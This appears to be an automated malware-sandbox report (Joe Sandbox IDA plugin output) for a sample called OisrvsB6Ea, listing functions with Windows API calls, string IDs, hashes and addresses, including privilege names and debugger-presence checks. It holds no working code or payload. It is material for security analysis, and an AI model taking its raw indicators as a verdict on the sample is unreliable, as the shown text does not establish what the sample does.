                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                  • String ID: %s %s$%s %s %s$P($REPLACEFILEDLG
                                                                                  • API String ID: 797121971-1277811542
                                                                                  • Opcode ID: 1ed7cdcb144c73718a9b6c46d252a9b6ce589c610f9541f14a025879b9525843
                                                                                  • Instruction ID: 184f8e21067889650804901e4a755421ef8f587a05193d5705d22f876df26954
                                                                                  • Opcode Fuzzy Hash: 1ed7cdcb144c73718a9b6c46d252a9b6ce589c610f9541f14a025879b9525843
                                                                                  • Instruction Fuzzy Hash: A091A572559345BBE221EBA0DC4DFFB77ACEB4A700F00481AB649D20C1DB75EA148B72
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00276FAA
                                                                                  • _wcslen.LIBCMT ref: 00277013
                                                                                  • _wcslen.LIBCMT ref: 00277084
                                                                                    • Part of subcall function 00277A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277AAB
                                                                                    • Part of subcall function 00277A9C: GetLastError.KERNEL32 ref: 00277AF1
                                                                                    • Part of subcall function 00277A9C: CloseHandle.KERNEL32(?), ref: 00277B00
                                                                                    • Part of subcall function 0027A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0027977F,?,?,002795CF,?,?,?,?,?,002A2641,000000FF), ref: 0027A1F1
                                                                                    • Part of subcall function 0027A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0027977F,?,?,002795CF,?,?,?,?,?,002A2641), ref: 0027A21F
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00277139
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00277155
                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00277298
                                                                                    • Part of subcall function 00279DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002773BC,?,?,?,00000000), ref: 00279DBC
                                                                                    • Part of subcall function 00279DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00279E70
                                                                                    • Part of subcall function 00279620: CloseHandle.KERNELBASE(000000FF,?,?,002795D6,?,?,?,?,?,002A2641,000000FF), ref: 0027963B
                                                                                    • Part of subcall function 0027A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A501
                                                                                    • Part of subcall function 0027A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A532
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                  • API String ID: 3983180755-3508440684
                                                                                  • Opcode ID: 78e4de3082f1a898b6aee081eb7d3c1c033b28bc7996486fd3360bc2f81a7e01
                                                                                  • Instruction ID: 3e8359c55adfe87ef9ab0b40feead4332726935ad75c4bc30a6785b62d9bf651
                                                                                  • Opcode Fuzzy Hash: 78e4de3082f1a898b6aee081eb7d3c1c033b28bc7996486fd3360bc2f81a7e01
                                                                                  • Instruction Fuzzy Hash: C4C1F871924615ABDB21EF74DC85FEEB3A8AF04300F00855AF95EE7182D770AA64CF61
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: __floor_pentium4
                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                  • API String ID: 4168288129-2761157908
                                                                                  • Opcode ID: 2be93541ffc18d44f1a4eb9edf46145670dada0a15d3cb544455932c85c39d40
                                                                                  • Instruction ID: 799ba48fe9a46d88a58c1ea173f9fd8bf85819953cf42a3e9cad3d9d770f0036
                                                                                  • Opcode Fuzzy Hash: 2be93541ffc18d44f1a4eb9edf46145670dada0a15d3cb544455932c85c39d40
                                                                                  • Instruction Fuzzy Hash: BCC25A72E286298FDF25CE28DD407EAB7B5EB48305F1541EAD84DE7240E774AE918F40
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_swprintf
                                                                                  • String ID: CMT$h%u$hc%u
                                                                                  • API String ID: 146138363-3282847064
                                                                                  • Opcode ID: 72aa42cbd020b90dae1a8e8f9befa199982faccf72176eafbd0ab9ed2c478878
                                                                                  • Instruction ID: 866b207517270cbbe77c25f54b4e29e3afb0f976512db581c81e5447cfc8821e
                                                                                  • Opcode Fuzzy Hash: 72aa42cbd020b90dae1a8e8f9befa199982faccf72176eafbd0ab9ed2c478878
                                                                                  • Instruction Fuzzy Hash: 0632E8715243859FDF18DF74C896AE93BA5AF15300F04847EFD8E8B282DB709659CB20
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00272874
                                                                                  • _strlen.LIBCMT ref: 00272E3F
                                                                                    • Part of subcall function 002802BA: __EH_prolog.LIBCMT ref: 002802BF
                                                                                    • Part of subcall function 00281B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0027BAE9,00000000,?,?,?,0001047E), ref: 00281BA0
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00272F91
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                  • String ID: CMT
                                                                                  • API String ID: 1206968400-2756464174
                                                                                  • Opcode ID: 8bb478ce23fe5a7129f03d44bf49b20e73e48c35b02deb0c9c584cb1f970aa41
                                                                                  • Instruction ID: 59c9eb82080b4a5cfc42ac045a65d96879e9b95c299525f98d415781e4757a89
                                                                                  • Opcode Fuzzy Hash: 8bb478ce23fe5a7129f03d44bf49b20e73e48c35b02deb0c9c584cb1f970aa41
                                                                                  • Instruction Fuzzy Hash: 88621671520245CFDB29DF34C8867EA37A1EF55300F18847EEC9E8B282DB759969CB60
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0028F844
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0028F910
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0028F930
                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0028F93A
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 254469556-0
                                                                                  • Opcode ID: 46a45e3c6d2c3c747ebfc9f853f8238985d5e85dcf78567a47b21dec8123a385
                                                                                  • Instruction ID: 17b48dcdbf2c4b0414aecfc3fa5ef6dd2861e85796211f34b0e755acfefccff2
                                                                                  • Opcode Fuzzy Hash: 46a45e3c6d2c3c747ebfc9f853f8238985d5e85dcf78567a47b21dec8123a385
                                                                                  • Instruction Fuzzy Hash: 38312B75D16219DBDB50EFA4D9897CCBBB8AF08304F1040EAE50CA7290EB719B859F44
                                                                                  APIs
                                                                                  • VirtualQuery.KERNEL32(80000000,0028E5E8,0000001C,0028E7DD,00000000,?,?,?,?,?,?,?,0028E5E8,00000004,002D1CEC,0028E86D), ref: 0028E6B4
                                                                                  • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0028E5E8,00000004,002D1CEC,0028E86D), ref: 0028E6CF
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: InfoQuerySystemVirtual
                                                                                  • String ID: D
                                                                                  • API String ID: 401686933-2746444292
                                                                                  • Opcode ID: e0c72a1d24b2efc56ce501ead120119537c0c1bb3b074c8082cce9ff500a6859
                                                                                  • Instruction ID: 5e4d8cb142a9e0185a72d42d5f3821451c0c70aefad6f122ea2af26b4d62ce81
                                                                                  • Opcode Fuzzy Hash: e0c72a1d24b2efc56ce501ead120119537c0c1bb3b074c8082cce9ff500a6859
                                                                                  • Instruction Fuzzy Hash: E6012B3661010A6BDF14EE29DC09BDD7BAAEFC4324F0DC120ED19D7190EA34D9158780
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00298FB5
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00298FBF
                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00298FCC
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  • Opcode ID: 9142b3aaee77c4a443be41d2bcabaa33a0aa1b213d5df931ea5bf75dea40868b
                                                                                  • Instruction ID: 76558b31a2cf71bc080f3fb96211d77fd0c66378bf5d9b2c6fd6bc49d856ff08
                                                                                  • Opcode Fuzzy Hash: 9142b3aaee77c4a443be41d2bcabaa33a0aa1b213d5df931ea5bf75dea40868b
                                                                                  • Instruction Fuzzy Hash: 3E31D475911219ABCB61DF24DD89B9CBBB8AF09310F5041EAE81CA7291EB309F918F44
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                  • Instruction ID: 3e03a63f3d63de57db9873845b566b2015e440ed789d99fa5b9c9300634a000d
                                                                                  • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                  • Instruction Fuzzy Hash: 8B023B71E102199FDF14CFA9C9806ADF7F5FF88314F25826AD819E7281D730AA519B90
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028AF35
                                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,002AE72C,?,?), ref: 0028AF84
                                                                                  Similarity
                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                  • String ID:
                                                                                  • API String ID: 2169056816-0
                                                                                  • Opcode ID: 578cc410d68fd2fe6a789439bb089e3264e2bf3224b9342ec0c919a5dc3c13b9
                                                                                  • Instruction ID: 58ab6aa8309f0a364de8563c67aac9bda0f45dc82edffec2840f400bee1a885f
                                                                                  • Opcode Fuzzy Hash: 578cc410d68fd2fe6a789439bb089e3264e2bf3224b9342ec0c919a5dc3c13b9
                                                                                  • Instruction Fuzzy Hash: E601217A250309ABDB50DF64ED49F9AB7BCEF09710F005422FA0597190D7709A25CBA5
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00276DDF,00000000,00000400), ref: 00276C74
                                                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00276C95
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: ecd755be354074e62805e657246b9035e7a56b3ea64822139094bfe5cfc5e1c8
                                                                                  • Instruction ID: 621fb4d4fd4f8ef852de053d78e71896e30e8787c898ba268258617d444ca160
                                                                                  • Opcode Fuzzy Hash: ecd755be354074e62805e657246b9035e7a56b3ea64822139094bfe5cfc5e1c8
                                                                                  • Instruction Fuzzy Hash: 90D0C931354301BFFA124F619D0EF2B7B99BF46B51F18C409B799E80E0CAB59424A629
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002A19EF,?,?,00000008,?,?,002A168F,00000000), ref: 002A1C21
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  • Opcode ID: 521b35543457e19d0b98e2ab6396d5daac8e08dcf272f6d6e2ec8e2b2ef46df0
                                                                                  • Instruction ID: 7cb738760920e8d65f5fbebdaafe016dcc60ce1a3f00411e1517471eb70e7293
                                                                                  • Opcode Fuzzy Hash: 521b35543457e19d0b98e2ab6396d5daac8e08dcf272f6d6e2ec8e2b2ef46df0
                                                                                  • Instruction Fuzzy Hash: A5B17E31220609DFD715CF28C48AB657BE1FF46374F258699E89ACF2A1C735D9A1CB40
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0028F66A
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 2325560087-0
                                                                                  • Opcode ID: 933baaa4683454897aceb922ab9d2a37c4c0003bf827010770b5b76c9304284d
                                                                                  • Instruction ID: 591abb2cca7f7f14c95ee9042c22de5f896319a490e8301fe9911ac7e5751916
                                                                                  • Opcode Fuzzy Hash: 933baaa4683454897aceb922ab9d2a37c4c0003bf827010770b5b76c9304284d
                                                                                  • Instruction Fuzzy Hash: 40519E75D1260A9FEB68CF94EE857AAF7F0FB48304F24842AD401EB291D3749D61CB50
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 0027B16B
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: gj
                                                                                  • API String ID: 0-4203073231
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0028F3A5), ref: 0028F9DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: HeapProcess
                                                                                  • String ID:
                                                                                  • API String ID: 54951025-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9f64def1522901235e8cd223907441362354ec33e12412bca47a6e6e04af8c5b
                                                                                  • Instruction ID: bf1ca50fc8f72498dbefde41e6236f1124fb500686ab2b023e5fb3d64f97e09e
                                                                                  • Opcode Fuzzy Hash: 9f64def1522901235e8cd223907441362354ec33e12412bca47a6e6e04af8c5b
                                                                                  • Instruction Fuzzy Hash: 85618731F30F3A56DE3A9F68A8A17BE2394EB02740F140619EC42DF281D291DD728B09
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                  • Instruction ID: 2cb9ab6d4409efdafa05d8d806311be826b8e41975cf56e50b4aca87545cb9e4
                                                                                  • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                  • Instruction Fuzzy Hash: E7516820330F6757DF375E28846AFBF23C59F05304F180919E88ACB682C645ED368791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e2a0f481607df9e16a6e7035513051298fc5279db0746338a7db9a4f231563ec
                                                                                  • Instruction ID: 779443f7f8fad0216783cd0aa880c61d91cdfc5eea823bd7db1a4f12a388b31e
                                                                                  • Opcode Fuzzy Hash: e2a0f481607df9e16a6e7035513051298fc5279db0746338a7db9a4f231563ec
                                                                                  • Instruction Fuzzy Hash: 8F51B33151D3D58FDB11CF28C64046EBFE0AEAA314F4A49A9E4DD5B243C231DA5ACB62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 49763a2ddeeae727a6d9285661c59647bc1a0094e07ec38bc8ba91c6c310806a
                                                                                  • Instruction ID: 771d9f55e0e827e9dac91144a3bd4bd695018f8dac9545612408026ca251a27c
                                                                                  • Opcode Fuzzy Hash: 49763a2ddeeae727a6d9285661c59647bc1a0094e07ec38bc8ba91c6c310806a
                                                                                  • Instruction Fuzzy Hash: B751D0B1A087159FC788CF19D48065AF7E1FF88314F058A2EE899E3340D734E959CB96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                  • Instruction ID: c95368126bcc7ad0eb4b6e95cb946c3e1023d18b16f359e016275d0740ff1a81
                                                                                  • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                  • Instruction Fuzzy Hash: 9631E4B5A247468FCB14EF28C85116EBBE0FB95714F14852DE489C7741C734EA1ACB92
                                                                                  APIs
                                                                                  • _swprintf.LIBCMT ref: 0027E30E
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                    • Part of subcall function 00281DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,002B1030,?,0027D928,00000000,?,00000050,002B1030), ref: 00281DC4
                                                                                  • _strlen.LIBCMT ref: 0027E32F
                                                                                  • SetDlgItemTextW.USER32(?,002AE274,?), ref: 0027E38F
                                                                                  • GetWindowRect.USER32(?,?), ref: 0027E3C9
                                                                                  • GetClientRect.USER32(?,?), ref: 0027E3D5
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0027E475
                                                                                  • GetWindowRect.USER32(?,?), ref: 0027E4A2
                                                                                  • SetWindowTextW.USER32(?,?), ref: 0027E4DB
                                                                                  • GetSystemMetrics.USER32(00000008), ref: 0027E4E3
                                                                                  • GetWindow.USER32(?,00000005), ref: 0027E4EE
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0027E51B
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 0027E58D
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                  • String ID: $%s:$CAPTION$d$t*
                                                                                  • API String ID: 2407758923-364107577
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0029CB66
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C71E
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C730
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C742
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C754
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C766
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C778
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C78A
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C79C
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7AE
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7C0
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7D2
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7E4
                                                                                    • Part of subcall function 0029C701: _free.LIBCMT ref: 0029C7F6
                                                                                  • _free.LIBCMT ref: 0029CB5B
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 0029CB7D
                                                                                  • _free.LIBCMT ref: 0029CB92
                                                                                  • _free.LIBCMT ref: 0029CB9D
                                                                                  • _free.LIBCMT ref: 0029CBBF
                                                                                  • _free.LIBCMT ref: 0029CBD2
                                                                                  • _free.LIBCMT ref: 0029CBE0
                                                                                  • _free.LIBCMT ref: 0029CBEB
                                                                                  • _free.LIBCMT ref: 0029CC23
                                                                                  • _free.LIBCMT ref: 0029CC2A
                                                                                  • _free.LIBCMT ref: 0029CC47
                                                                                  • _free.LIBCMT ref: 0029CC5F
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID: h*
                                                                                  • API String ID: 161543041-2779658993
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00299705
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
